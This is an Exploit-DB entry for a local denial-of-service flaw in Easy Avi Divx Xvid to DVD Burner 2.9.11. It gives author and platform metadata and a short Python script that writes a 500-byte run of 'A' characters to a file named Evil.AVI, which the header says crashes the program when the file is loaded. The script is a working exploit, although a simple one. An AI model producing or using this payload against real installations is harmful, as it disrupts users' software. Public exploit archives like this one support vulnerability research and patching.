Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service

EDB-ID: 44338
Author: Hashim Jawad
Published: 2018-03-23
CVE: N/A
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: N/A
Tags: Denial of Service (DoS), Local
Vulnerable App: Download Vulnerable Application

 ########################################################################################### 
# Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe #
# Tested on OS : Windows XP professional SP3 #
# Windows 10 professional 64-bit #
# Steps to reproduce : Add Evil.AVI and BOOM! #
###########################################################################################

buffer = "A" * 500

try:
f=open("Evil.AVI","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Related Posts